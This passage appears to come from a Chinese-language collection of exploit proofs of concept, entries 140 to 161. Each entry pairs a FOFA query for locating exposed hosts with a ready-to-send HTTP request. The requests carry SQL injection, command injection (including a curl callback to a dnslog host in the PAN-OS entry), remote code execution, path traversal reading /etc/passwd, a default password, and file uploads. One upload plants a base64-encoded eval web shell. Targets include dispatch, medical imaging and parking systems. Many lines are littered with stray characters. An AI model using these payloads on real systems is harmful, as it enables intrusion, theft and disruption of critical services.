) Y+ X7 e3 }$ A2 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.06 l1 H7 d% l) W. G, g* K7 E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* l8 i+ e* V; j) `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
S$ Z! ] U$ e) rAccept-Encoding: gzip, deflate, br
+ ~" ]! z5 F+ W, E% q1 c: WConnection: close
: V E% Z: X3 y: z+ d4 ~% sCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
! b" ^. u' c+ e/ ]Upgrade-Insecure-Requests: 1- B: B8 f) `+ b- J
. F# i% q6 I0 s; v6 K1 M8 ^
6 i ^4 D; _) p' A6 M! X6 \140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入3 I: `+ W4 M# L9 a$ m4 c
CVE-2024-25664 c A* |! ?* r5 r5 n! P
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
# ~8 p% U, u$ p p4 D1 AGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
; g' D+ ~% k- \! [) N. p7 RHost: x.x.x.x
5 u0 W) P9 @- S# R7 J% [7 x. N% b/ O3 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.09 Y0 R6 Y5 d$ |6 Y; T; X2 ]* D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: F0 K) d# Q9 V( p5 F" M3 }+ F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 ^6 B* H) h3 U, r- g% GAccept-Encoding: gzip, deflate, br
. n! b; @( [9 S, }: W; LConnection: close
" m; d3 J% E. Q5 G! w9 r" q, _& b' kCookie: authcode=h8g91 H0 ^7 w5 ^+ F# W
Upgrade-Insecure-Requests: 1- a2 U& {8 D2 A/ k( }) A
: s0 a7 @& J8 U; |2 o) u* V& P
7 T, I8 {$ X k; r141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
/ |$ c$ e+ w" V3 |/ B+ i6 aFOFA:body="指挥调度管理平台"
* c6 P9 \# P& B3 u! lPOST /app/ext/ajax_users.php HTTP/1.1 e: s6 I6 E! r6 H z
Host: your-ip
2 a/ {8 ?0 X" {: @$ ]* _! KUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info/ L3 I, Q8 S4 ?% ?
Content-Type: application/x-www-form-urlencoded. `% \9 r9 z2 j' E' }! M* J
9 n: M; [+ z6 ~, F0 T0 ?
. ~- Z4 u6 b: W
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
/ w! Z) i6 Y+ _1 Q m& g2 s8 O( q/ N' X, e! i
- y9 V9 A& b8 Q* [7 ?* o0 W
142. CMSV6车辆监控平台系统中存在弱密码/ e: g: o2 B8 _# M' f g; p( r! q
CVE-2024-29666
: t& ]1 x9 D7 k0 }8 J( M* N5 TFOFA:body="/808gps/"
2 f7 {9 W9 U5 S3 U5 q' Badmin/admin
+ I+ ?) A# `5 h: D. }* ^/ B; ?143. Netis WF2780 v2.1.40144 远程命令执行2 T" {, P8 F4 {3 k) I6 @3 X- s
CVE-2024-25850( k6 X q/ c8 w, f% i9 r5 m
FOFA:title='AP setup' && header='netis'2 S+ g9 g% E( P) F' x
PAYLOAD
+ C+ z, W0 q# X8 b8 r; Q; G& b U r: C1 a# `2 g+ H
144. D-Link nas_sharing.cgi 命令注入
: I/ c6 @; Z7 HFOFA:app="D_Link-DNS-ShareCenter"
& V% d2 c# J3 U+ X: Y7 G! zsystem参数用于传要执行的命令
" Q( `, H9 G/ G* ?0 D9 G; kGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1& Q1 W7 {2 G! l t0 m
Host: x.x.x.x5 }. H1 m9 u0 S4 s0 l
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0# z3 Y9 R( v' k, K
Connection: close
1 ?7 S2 E6 }& E, y" A! \+ }5 YAccept: */*
2 ?2 M2 Y6 C: p$ LAccept-Language: en
1 t( L6 Y, j& [# VAccept-Encoding: gzip
# K( n8 J2 g# ~/ [1 t2 [6 v/ e3 B) s' v& M" l7 J
4 w! b' x/ d7 U1 T% \" S
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
% h+ K2 u$ R/ y" G- v4 TCVE-2024-3400) i/ y( y" J) H: J. x5 O% P
FOFA:icon_hash="-631559155"
" ^: l- m5 f& ?6 b; J, AGET /global-protect/login.esp HTTP/1.12 F/ S/ x. q8 C) @% o3 k( B3 V7 }
Host: 192.168.30.112:1005
- Y/ D! n0 U* U* M! _# G/ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.848 V( Z% R4 B7 u9 k {: q" J
Connection: close
2 q/ e3 Y/ K/ E+ pCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;( {6 F; {- _) k+ ~7 D0 t
Accept-Encoding: gzip
0 }% W- m5 @8 K( r/ b7 ?8 {
2 P' C3 R J8 a" t
: h/ j3 ~% W$ h146. MajorDoMo thumb.php 未授权远程代码执行
! Z7 D# X2 _, {8 zCNVD-2024-02175( L4 V! ~8 E. F) c: w* {1 o
FOFA:app="MajordomoSL"/ x' Q7 ^3 W) w6 D8 D! O5 E' }
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
6 e5 c: B5 |: y: r' uHost: x.x.x.x
5 b8 P$ G; |0 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84 R( `3 K( u; E% |5 E
Accept-Charset: utf-86 u) n) G* `" y# j6 ~
Accept-Encoding: gzip, deflate
0 u. |7 d! a! z8 DConnection: close
" m' m* n: u* `
. t" r$ {' H0 w
/ v- I) \; O' i. E/ v& O4 d: i147. RaidenMAILD邮件服务器v.4.9.4-路径遍历3 m" U1 D+ t6 g
CVE-2024-32399
: g: o' E* K) i$ U9 ?+ oFOFA:body="RaidenMAILD"
( K5 w- D4 t1 S4 j0 A2 FGET /webeditor/../../../windows/win.ini HTTP/1.1 a$ P2 e2 q) o- E
Host: 127.0.0.1:81
! a3 N+ |/ j8 b/ u# eCache-Control: max-age=0
0 E% o! a9 g3 Z% X4 [Connection: close* F; t! A) M, C8 a! d; f {
( @" b- {- z& r5 v' P) K; _* j. E5 ]- Z$ p y2 t, m
148. CrushFTP 认证绕过模板注入8 f: o3 R& U& ^& ?* d$ [: ]6 ?
CVE-2024-40400 B" ?/ p' `4 e$ {3 J5 l# e
FOFA:body="CrushFTP"
* F* R/ c" ^1 RPAYLOAD6 W3 x2 h+ q! ?- v
6 b% q( U# T2 N
149. AJ-Report开源数据大屏存在远程命令执行0 l6 K! b5 M3 d$ f- s
FOFA:title="AJ-Report", y- a: c4 t! W& L) w& O* v
8 A, M4 v# I' c+ B0 n: X( `& H
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
$ V& o. w; R+ Q' t2 eHost: x.x.x.x
# X$ r4 d- v& w/ Z3 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, a& P4 \: b4 M' ~' X3 B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ H/ `6 s0 h8 NAccept-Encoding: gzip, deflate, br
) {7 [4 b0 z; oAccept-Language: zh-CN,zh;q=0.9
3 Y {- i8 _- I% R! _* |, WContent-Type: application/json;charset=UTF-8( @5 V- y: G5 N2 A
Connection: close
% D0 K9 c4 [4 Y. V' A( y4 e" v- j0 u4 N h
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
7 p' ^0 E- j. d$ \( i5 s* G# d- z* a6 g3 D/ U3 y* t
150. AJ-Report 1.4.0 认证绕过与远程代码执行
6 \- v" ?9 F- q T( N% J( ^FOFA:title="AJ-Report"
B% E2 E* S$ h, n; _6 }4 a! EPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1! l4 p/ \, F8 O; f. I% A+ q- @
Host: x.x.x.x
@0 u( ?4 j T1 r7 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 J: W' \; V) J$ sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% G/ e x( @4 N. CAccept-Encoding: gzip, deflate, br
* L( p2 u3 | z- D8 ?* PAccept-Language: zh-CN,zh;q=0.9
! M0 `; B% {! o- j$ R" N& I4 gContent-Type: application/json;charset=UTF-8
3 n0 F2 t, ^+ N- i7 f9 Z/ OConnection: close7 z0 u+ g! F: J- f, ~- h* j
Content-Length: 339
& }) ?& v0 M" q! a5 J5 x- {* [6 |" p: N |" o0 r, L
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}# g" a$ j- E# _1 ^7 ]/ P" U: ]
3 w! m* @7 z6 }5 U9 Q! f& y( V
. N3 F% h- R: U; u151. AJ-Report 1.4.1 pageList sql注入; R% Q. M% `% n( Q' c& L; t
FOFA:title="AJ-Report", T# |5 L! J- E W# S0 Q6 I9 t
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.10 d' W T1 T7 c0 Q4 `6 i
Host: x.x.x.x
+ G% r" f+ V3 D" r6 G. A9 }6 o. \! eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ g/ l2 S7 y( [# ?
Connection: close; J f& X( s6 f
Accept-Encoding: gzip
1 m( v+ U. S4 d6 z7 |
m I# T6 c$ b
. O+ s% L: w+ i: G5 g2 D+ m0 j152. Progress Kemp LoadMaster 远程命令执行
. U/ w& J6 R1 jCVE-2024-1212/ c3 U+ M: u; ^
LoadMaster <= 7.2.59.2 (GA). Z2 x! t7 [8 f
LoadMaster<=7.2.54.8 (LTSF)* [* l1 j" A# u- @: I
LoadMaster <= 7.2.48.10 (LTS)' a3 n) `/ q) F/ s0 F
FOFA:body="LoadMaster"
/ Q0 O u) [: G6 X3 p8 b/ ]JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
1 o# y8 W' ^! hGET /access/set?param=enableapi&value=1 HTTP/1.1, c, a4 F2 h% `; @9 @9 d0 C2 G% _0 }* a
Host: x.x.x.x! p+ Q+ }. f' d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1" n1 d! s* e- ~: t' f
Connection: close; P! d" q+ b5 f4 k
Accept: */*3 P/ Y! s6 y7 T. m
Accept-Language: en, s% O3 a0 Z6 w1 H
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
" L |& C' G+ ~' P) GAccept-Encoding: gzip
4 _* D% R' W# t6 h, `" w, h& G! V- z; z4 h+ c
8 K- ?. c$ V3 ~* A: s% c7 x+ t153. gradio任意文件读取
7 o! w2 l9 m' r0 v7 _3 iCVE-2024-1561FOFA:body="__gradio_mode__") f9 w0 d0 m9 q q& J! B
第一步,请求/config文件获取componets的id; {( P, s" y; W+ H& [
http://x.x.x.x/config
+ w+ Q# v' ~- z; R, \0 [1 ? `5 _) U- M6 E
9 T; [+ @+ H2 p. w# S2 w* V; [/ N2 w第二步,将/etc/passwd的内容写入到一个临时文件& _) a% z- x1 a# d
POST /component_server HTTP/1.1) t8 {) D1 _8 B7 n: T( f
Host: x.x.x.x' H2 u; h0 V! V) \1 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
1 ?" G0 y2 f! Q5 c4 RConnection: close5 s: e; `7 D0 A4 ^5 q1 ]* Z
Content-Length: 115
7 e9 X6 o& s d& y$ {' EContent-Type: application/json
0 A0 d# l5 `, @2 z- @, T2 S0 oAccept-Encoding: gzip
w$ @: M% p* m
( z0 }; i0 v1 v% |6 t$ Q2 J{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}) |+ K- T; F5 h, Q p! U; y* P
7 q g& e, | V( J2 ?( h
7 v! v/ Z; I9 d, A第三步访问
7 j6 W( L' g/ w; dhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd! n) y [+ D+ J
, x5 w- j/ o U% l. _
' { J2 i9 n1 F/ J Q( L154. 天维尔消防救援作战调度平台 SQL注入
+ y' v+ _1 D- a: y' w9 x% R& aCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"1 k6 M2 @, k' G4 L6 {+ J
POST /twms-service-mfs/mfsNotice/page HTTP/1.1. p% |; {3 H3 A; p& h$ H9 p4 z# C7 B
Host: x.x.x.x
5 R/ Q* g! B0 e5 rContent-Length: 106& u7 c) t& | ~( C3 q- M
Cache-Control: max-age=0
2 ]" \- ~ b. R1 J( z$ pUpgrade-Insecure-Requests: 1# p: i$ l, p1 j* P
Origin: http://x.x.x.x
5 o( b/ h3 t0 TContent-Type: application/json
5 P2 s% T# A3 R9 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
4 ]* S! q( |: F7 W- `9 k( w1 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% `' W6 Q$ y$ ^( j; m9 p
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
& z* c2 L% W" b u( uAccept-Encoding: gzip, deflate
% q5 b5 z3 n" C' V6 v9 [% KAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
& ?) [- K4 ^8 P4 P' f2 |5 sConnection: close. x7 H; W9 a3 l C9 J# z
. j5 @' [3 y' Y3 y
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}( F/ R/ a% L2 j+ } p
4 y" g$ m) o' f0 a! L( F/ J, {! Y
( y) V( q/ m( o! r, z- z+ C Q
155. 六零导航页 file.php 任意文件上传
$ @$ g$ b" s3 y6 u# r* h: SCVE-2024-34982+ P5 n! ]2 N4 L. B
FOFA:title=="上网导航 - LyLme Spage"7 g. b1 h! k( g. l; H) [6 }
POST /include/file.php HTTP/1.1
6 K) Y- c8 N4 \, }% v% [Host: x.x.x.x
* s- s; W& `" ?6 T7 l6 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0; U( \9 D: M' w y
Connection: close+ T9 l D" g x1 k% J
Content-Length: 232- O- J, g" H$ U$ [
Accept: application/json, text/javascript, */*; q=0.01# u1 h, b. c n6 M/ P. J
Accept-Encoding: gzip, deflate, br2 [5 j) E4 H; W' P7 l9 B+ O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! a' A9 W+ g5 C8 ]( C5 U% ?1 v
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
! s ~6 f/ L( @( U* X5 u" ZX-Requested-With: XMLHttpRequest" a# @9 F( U8 o' r
; |" {7 s8 d" [' C; v) [
-----------------------------qttl7vemrsold314zg0f
! O; `% M9 g& C1 f0 J& p8 fContent-Disposition: form-data; name="file"; filename="test.php"% M$ G0 K# h, G3 ~
Content-Type: image/png4 E* O* z0 }9 ` M: m$ o
/ N. H9 f6 i0 n5 P7 ]8 z# F! @<?php phpinfo();unlink(__FILE__);?>
1 h% Y- @9 d& p h-----------------------------qttl7vemrsold314zg0f--
5 T2 I% b; f# V0 A
O4 P* \5 }7 ]/ i/ x7 A1 k& x
7 s# L+ \8 x/ Y8 b. k' [访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php; E2 w" A+ l+ A# F. b1 W% ^
0 `7 z5 N# n1 }" H
156. TBK DVR-4104/DVR-4216 操作系统命令注入" E* i, k: `+ m$ }9 e4 W& f: ~
CVE-2024-37219 L/ t/ O' K& V
FOFA:"Location: /login.rsp"* Q! T+ \, \# R, s8 g
·TBK DVR-41049 l$ {/ R8 v" E1 N& |! c
·TBK DVR-4216' \& ^# ]9 c3 _2 v3 P( K) ~3 P
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
3 D2 j0 l$ ]* H0 e3 Z4 a+ i7 y, g Q, a. h" T
+ i2 ~/ ^8 e, Q: T; Q/ Y% b$ E
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
- ~* w& `3 G$ J [, yHost: x.x.x.x5 m' m5 j1 v% O/ ?- I2 P) H
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! L% F$ @3 a/ Q4 o2 h+ W
Connection: close
1 Z8 d! o* R5 }' RContent-Length: 0
: D+ ~9 t* \/ b2 D4 t3 kCookie: uid=1
( a1 e: k8 u* e8 AAccept-Encoding: gzip
/ U5 h' d, G% C. W& d0 I4 i) n: ~$ Y
9 V, a: n: z' U% E4 T" o4 N0 h157. 美特CRM upload.jsp 任意文件上传. j# s5 M6 Q' R0 l9 ~) z# _
CNVD-2023-06971
* F T7 O$ y' i3 U/ AFOFA:body="/common/scripts/basic.js"2 {. h) F! i* ^
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
; o' P; e1 U+ d8 NHost: x.x.x.x9 u3 j3 ]/ R6 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36+ F- B4 W m9 b/ t* P; `
Content-Length: 7096 W9 G5 T0 M; I, L! {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 U6 H6 S8 g6 c7 C: q% s) {& X/ @
Accept-Encoding: gzip, deflate
, ^/ g- J. P+ q5 T( Y3 \9 [9 jAccept-Language: zh-CN,zh;q=0.9
/ e* n; S6 J* e! y3 r( s4 pCache-Control: max-age=07 p. L! ^8 X" i4 z# o- }
Connection: close
- H" t; e* \. `" P. L4 }Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN. I2 e0 }. m( j
Upgrade-Insecure-Requests: 1& J7 u# ^, v. Q
) W4 m- X1 j3 t' }
------WebKitFormBoundary1imovELzPsfzp5dN
9 f% T* y* u# E3 z0 l( r. ?; sContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp". b3 n* S) z) ~7 \
Content-Type: application/octet-stream
/ m, V/ ~. ]5 e- {2 I* H6 J3 f- R' k7 Y
9 V, H6 j/ E B% z) [" c& x Ynyhelxrutzwhrsvsrafb; _' B, {0 B6 p+ M. U. X* q
------WebKitFormBoundary1imovELzPsfzp5dN
$ p6 M0 C, J# i8 d5 K$ N! X2 aContent-Disposition: form-data; name="key"3 y4 R$ E0 G6 L/ s% b( i7 R- i# e7 x
$ B; Z5 k# S. t; S! e! wnull; {/ }, \# k4 D" s
------WebKitFormBoundary1imovELzPsfzp5dN0 g1 o* q1 R$ h3 v- R! ]3 s
Content-Disposition: form-data; name="form"& K4 V* ?, m6 [1 d* D: U2 m- |
; x8 v) Z5 l n1 y7 s* F! E3 M- lnull
' A: Z8 F& `1 T4 t: G------WebKitFormBoundary1imovELzPsfzp5dN
) h b) y! m1 @* g8 I$ MContent-Disposition: form-data; name="field"+ M# i) t: ?) s. B1 m
1 p( v2 I' R5 K8 Anull: I1 f6 ?! L7 J+ r) K
------WebKitFormBoundary1imovELzPsfzp5dN
p- L5 L# p, L( N/ Q& I$ MContent-Disposition: form-data; name="filetitile"
7 X# T& d) e/ t/ N
) I* W5 G( t5 J: x. y* Tnull, y' I4 M8 r! h8 j& F0 y- O
------WebKitFormBoundary1imovELzPsfzp5dN
. K( c3 m- z7 t; F8 ]2 }Content-Disposition: form-data; name="filefolder"
1 b8 \' S* K. K% y0 S C' {) Z7 Z
: @4 }) D! l; c M* P4 h/ a+ Nnull
L/ f8 @$ ?( g$ `9 T7 M------WebKitFormBoundary1imovELzPsfzp5dN--
& l& F2 r( E4 ]% b5 [
! [2 a, x' _8 C8 ?
+ u2 w) \ V. O# dhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
$ p: L1 H6 D/ a+ z0 u6 T( w1 n- z# s+ s
158. Mura-CMS-processAsyncObject存在SQL注入
. j3 E- j$ L( l( FCVE-2024-32640
4 w# q' {0 T, ~FOFA:"Generator: Masa CMS"& o% i% ?, o5 T( p; N
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.15 Z) ^( S7 m; g* G9 g# a) e
Host: {{Hostname}}4 e1 m! z6 _7 I% F. _3 }6 Q( N% S
Content-Type: application/x-www-form-urlencoded& ?5 y5 w; N3 {" S+ g
6 o7 T- I$ w' K3 t1 P: e8 \& Y. uobject=displayregion&contenthistid=x\'&previewid=16 i. M4 u2 \! [% \" a/ c
& b. M" W8 g- y6 A* |$ t0 S
D& A% c2 n7 W' j
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传+ n1 [& F/ \/ q3 h6 T) Z7 L& R
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
$ _' [% q$ W; C0 i7 ZPOST /webservices/WebJobUpload.asmx HTTP/1.1
' T L' ?! B) n. x7 j) B: DHost: x.x.x.x
) B" V0 f2 h( T. T( ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
9 ?5 \/ ~+ y& [+ N) _Content-Length: 1080
% n- t- L8 `2 Q/ U* r9 I/ DAccept-Encoding: gzip, deflate I5 k% B9 w: |3 v1 y9 \
Connection: close
: ^& J9 U1 }3 X) ~* dContent-Type: text/xml; charset=utf-8, ~9 v- v' ?1 n2 I; g* J0 v/ `
Soapaction: "http://rainier/jobUpload"
- ~2 _3 ~8 R. R: L1 }1 T3 f0 V! v- v
<?xml version="1.0" encoding="utf-8"?>' k; A$ i- `& x; T! m! N- N
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">/ j) \) d* m2 W1 R
<soap:Body>
' {5 }; ~0 f$ z+ A y<jobUpload xmlns="http://rainier">! r4 K) {& v x0 S9 l! j
<vcode>1</vcode>
( y! ~. f6 }# ?" Y* ?3 J/ {<subFolder></subFolder>
/ g* Y9 L1 S1 L% u; K<fileName>abcrce.asmx</fileName>
3 d3 k3 R( p1 |0 k<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
9 p: E' ]4 Y/ c; _# Q</jobUpload>: b: a. ~: R$ B* X {
</soap:Body>. @9 z. s" U+ z, M/ Q
</soap:Envelope>5 a" h" g. N0 ?
5 [" n( Y( _1 o
) T& ^- P8 X, g) O1 w/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")& ?0 `% X$ ~8 l5 c% X4 ]
9 o% w2 e2 Q: k! G( q1 D
# M8 j( f+ F) Z% B3 u+ ?160. Sonatype Nexus Repository 3目录遍历与文件读取% L& |; u, b, v; C: t
CVE-2024-49566 D* a' _8 w4 P; D5 D
FOFA:title="Nexus Repository Manager"
/ a" G [1 w8 N7 V9 B- e* i5 i7 qGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
& [0 d* n* ~6 uHost: x.x.x.x2 P$ J% K, e* s' P
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.02 b) _% r h# X6 S* |$ P# i
Connection: close8 N+ R2 k( s r
Accept: */*
$ C, R5 V) s+ z a& KAccept-Language: en
9 X0 h5 b9 K& T5 P# J+ C) T. EAccept-Encoding: gzip
6 ~$ T3 x, k3 P) ? |2 v: d3 t% _+ \7 a5 T! c N
/ C0 P% H5 u* i161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传2 H! L3 c, V( c; A
FOFA:body="/KT_Css/qd_defaul.css"9 e) t A. U) w% M1 ^% t
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
0 [6 H. M. Z) V* |2 Q: a1 D) {POST /Webservice.asmx HTTP/1.1; G* F- l* K* ?! t. E' g8 F
Host: x.x.x.x* y V) ?4 Q( G2 J/ s. L& A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36& ~7 f# J2 o& s B3 V) a
Connection: close3 c" `' l4 R+ D! G# \0 Z3 r/ i
Content-Length: 445& I' K q5 O# t2 a' `
Content-Type: text/xml
' F' b& m# X5 k2 O" k) y( W& nAccept-Encoding: gzip. w, e" d9 X/ _% T% U0 h
% P- n9 K& ^7 [, l8 k
<?xml version="1.0" encoding="utf-8"?>" O. X% H$ J, |3 i* e7 r: R
<soap:Envelope xmlns:xsi="& r3 ]. i7 G4 k& ^, T
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" D1 e9 n' _4 r- i4 I7 l$ c
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
0 |. F+ `* w7 r, {6 m3 q' T<soap:Body>$ J0 ]9 S; r( ~" q. M' r
<UploadResume xmlns="http://tempuri.org/">* B8 O$ m7 ?! }) q4 ~ c
<ip>1</ip>
! J" W' L3 Y$ y9 Z- O. t0 C: P<fileName>../../../../dizxdell.aspx</fileName>
* U) f1 B# F/ K2 m! b$ G<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>- \8 v0 x0 t2 r8 n, l9 \/ x
<tag>3</tag>
q+ r( T7 Q+ q0 R9 ` i</UploadResume>% a, |9 B. ~; M: J! Z5 [2 m3 v$ x
</soap:Body>
